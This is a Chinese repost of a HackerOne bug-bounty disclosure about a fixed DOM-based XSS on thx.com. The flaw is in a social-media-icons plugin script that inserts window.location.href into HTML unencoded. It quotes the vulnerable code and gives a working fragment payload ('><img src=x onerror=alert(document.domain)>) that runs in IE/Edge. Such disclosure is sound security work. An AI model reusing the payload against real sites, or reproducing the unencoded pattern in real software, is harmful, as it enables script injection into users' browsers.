前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >HackerOne | 目标DOM型XSS在IE/Edge浏览器

HackerOne | 目标DOM型XSS在IE/Edge浏览器

作者头像
Timeline Sec
发布2019-12-15 11:48:02
5040
发布2019-12-15 11:48:02
举报
文章被收录于专栏:Timeline Sec

漏洞信息

发现者:enesdexh1

漏洞种类:DOM型XSS

危害等级:中危

漏洞状态:已修复

前言

我刚刚发现,由于https://www.thx.com/assets/plugins/ultimate-social-media-icons/js/custom.js?ver=5.2.3 js文件容易利用导致DOM型XSS漏洞

漏洞再现

首先,我想说,这是有漏洞的代码

代码语言:javascript
复制
function sfsi_mobile_wechat_share(url) {
    if (jQuery('.sfsi_wechat_follow_overlay').length == 0) {
        jQuery('body').append(
            "<div class='sfsi_wechat_follow_overlay sfsi_overlay show'><div class='sfsi_inner_display'><a class='close_btn' href='' onclick=\"event.preventDefault();close_overlay(\'.sfsi_wechat_follow_overlay\')\" >×</a><div style='width:95%; min-height:80%;background-color:#fff;margin:0 auto;margin:30% auto;padding: 20px 0;'><div style='width:90%;margin: 0 auto;'><input type='text' value='" +
            window.location.href +
            "' style='width:100%;padding:7px 0;text-align:center' /></div><div style='width:80%;margin:10px auto 0 auto'><div class='sfsi_upload_butt_container' ><button onclick='sfsi_copy_text_parent_input(event)' class='upload_butt' >Copy</button></div><div class='sfsi_upload_butt_container' ><a href='weixin://' class='upload_butt'>Open WeChat</a></div></div></div></div>"
        );

正如你所看到window.location.href是脆弱的DOM型XSS,因为没有编码

首先去主页https://www.thx.com/,然后添加

代码语言:javascript
复制
#'><img src=x onerror=alert(document.domain)>

像这样

代码语言:javascript
复制
https://www.thx.com/#'%3E<img src=x onerror=alert(document.domain)>

但是,Chrome和Firefox将无法正常工作,因为他们有location.href默认编码,只有微软Edge和IE浏览器能够执行

如图:

漏洞影响

1、黑客执行恶意代码受害者的浏览器 2、跳转到恶意网站 3、任意js代码可以在受害者的浏览器中执行

翻译自hackerone

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-11-26,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档